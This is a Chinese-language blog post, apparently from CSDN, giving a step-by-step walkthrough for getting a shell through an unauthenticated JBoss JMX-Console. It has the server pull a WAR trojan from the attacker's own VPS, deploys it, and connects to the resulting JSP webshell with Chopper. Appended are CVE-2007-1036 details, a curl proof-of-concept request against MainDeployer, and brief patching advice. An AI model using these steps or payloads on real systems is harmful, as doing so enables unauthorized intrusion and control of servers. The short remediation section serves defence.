【实战】Jboss未授权访问(JMX-Console)Getshell

都是重复造轮子,没啥技术含量,只能说以后遇到了知道怎么操作就行。

GO:

访问地址:http://ip/JMX-Console

在这里插入图片描述

找到jboss.deployment

在这里插入图片描述
进入页面后找到void addURL()

在这里插入图片描述

此时部署我们远程的war木马,部署好了以后点击Invoke
http:vpsIP地址/soft/cus.war

随后来到URLList中查看Value值是否已经部署好,并且为我们的远程war木马地址

在这里插入图片描述
最后点击Apply Changes 后耐心等待一会儿,然后回到JMX-Console目录中
找到jboss.web.deployment查看是否存在我们部署的war木马。

在这里插入图片描述
此时可以看到已经部署成功。访问地址:ip/cus/cus.jsp菜刀连接即可

在这里插入图片描述
在这里插入图片描述

### JBoss 漏洞 CVE-2007-1036 详情 JBoss 应用服务器中的 `jmx-console` 组件存在安全漏洞,允许未经身份验证的攻击者通过发送特定请求来执行任意命令。此漏洞源于对用户输入缺乏充分验证,使得恶意用户能够操纵应用程序接口并触发潜在危险操作。 受影响版本括但不限于: - JBoss Application Server 4.0.x 和 4.2.x 版本[^2] ### 影响范围与风险评估 由于 jmx-console 默认情况下处于启用状态,并且无需认证即可访问,这极大地增加了被攻击的风险。一旦成功利用该漏洞,攻击者可以在目标系统上获得较高权限,进而完全控制受感染主机。 ### 利用方式概述 为了验证是否存在此漏洞以及测试其可行性,通常会采用如下方法: 1. 构建 payload 来尝试调用敏感功能; 2. 尝试上传 JSP 木马文件到服务器端; 3. 验证是否可以正常浏览所上传的 JSP 文件以确认写入成功情况; 具体 Payload 实现可能涉及构造特殊的 HTTP 请求参数组合,这些参数会被错误处理从而导致未授权的操作被执行。 ### 获取 Shell (GetShell) 当上述步骤均顺利完成之后,最终目的是获取一个交互式的 shell 或者 reverse_shell 连接,以便进一步探索内部网络资源或实施其他形式的数据窃取行为。 ```bash curl http://target/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.system%3Aservice%3DMainDeployer&methodName=startApplication&argType=&arg0= ``` 请注意以上仅为概念证明性质的内容展示,在实际环境中应严格遵循合法合规原则进行渗透测试活动。 ### 安全修复建议 针对这一严重的安全隐患,官方已经发布了补丁程序更新了相关组件的安全机制。对于仍在使用旧版软件的企业和个人而言,强烈推荐尽快升级至最新稳定发行版,并采取额外措施加强 Web 控制台的身份验证流程,关闭不必要的管理界面公开暴露于公网之上。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值